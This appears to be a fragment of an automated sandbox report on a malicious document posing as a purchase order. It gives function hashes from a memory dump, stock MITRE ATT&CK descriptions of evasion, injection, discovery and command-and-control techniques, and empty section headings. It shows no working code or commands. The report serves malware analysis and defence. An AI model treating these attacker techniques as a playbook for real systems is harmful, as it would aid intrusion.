Opcode ID: 1ad0c2afdb41d3b91dacc90468a924f397b081a2fb6498035abc14c1603a1bed
Instruction ID: 995b634fb36bc6d93e70cccd35699aeabb74727a0ea85288c05b29745d045696
Opcode Fuzzy Hash: 1ad0c2afdb41d3b91dacc90468a924f397b081a2fb6498035abc14c1603a1bed
Instruction Fuzzy Hash: 8C51F86050C342CEDF34CF688594B69BAE19F62364F15C299DC968B2EAD737C442F712

Uniqueness

Uniqueness Score: -1.00%

Function 0009381F, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c72dd291045878ad9867a69c1b0cf434a7d99346cfc1345e77409de901eea049
Instruction ID: ba58ca6c01958dcfd7bfbdb98043ed6f88d72f61166409842f1507de380b93bb
Opcode Fuzzy Hash: c72dd291045878ad9867a69c1b0cf434a7d99346cfc1345e77409de901eea049
Instruction Fuzzy Hash: 2DF0EC0AB4C3129DFF3A646506953FF558747A2370EF5443ABC47722859E848BC53A16

Uniqueness

Uniqueness Score: -1.00%

Function 000955CD, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebba9c2aea6c8ef30e5da1455fa60a820bcf0e2e60421e14c45400ee5632456
Instruction ID: 4c2ab34e8fe314f51699fcee5a978810253941f784156caea7ff5accac30cbb9
Opcode Fuzzy Hash: cebba9c2aea6c8ef30e5da1455fa60a820bcf0e2e60421e14c45400ee5632456
Instruction Fuzzy Hash: 60D02232208C04CFEAB3CA9AC980B9837B2EB01310FF100D0E52287202CA68E940FF40

Uniqueness

Uniqueness Score: -1.00%

Function 000936C3, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43e18c6c488bb2890e2b2032b0a31240b704b9bd6624a83d250de991f0b7430
Instruction ID: fa6ee50fb4a3f8810edff35437140697dbe7461f56d3cf080940f546768ca837
Opcode Fuzzy Hash: e43e18c6c488bb2890e2b2032b0a31240b704b9bd6624a83d250de991f0b7430
Instruction Fuzzy Hash: A0D0A9FA340B809BFE2A8908C9C1B483732A760B00F0440E4EC02C7740C319DA109A00

Uniqueness

Uniqueness Score: -1.00%

Function 000938DD, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c38d4633d4832e65859b403db2144361899420abc76b34cffb85c39da835899
Instruction ID: 10af041e45e8eee97a19dda99d537d98bdc9de24836ed46c9a918cfc7d145404
Opcode Fuzzy Hash: 5c38d4633d4832e65859b403db2144361899420abc76b34cffb85c39da835899
Instruction Fuzzy Hash: 77B09285A4820318EE73B85402C02A5BC4B171B370EBA94A028467665626C88A957049

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report purchase order_2242021.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage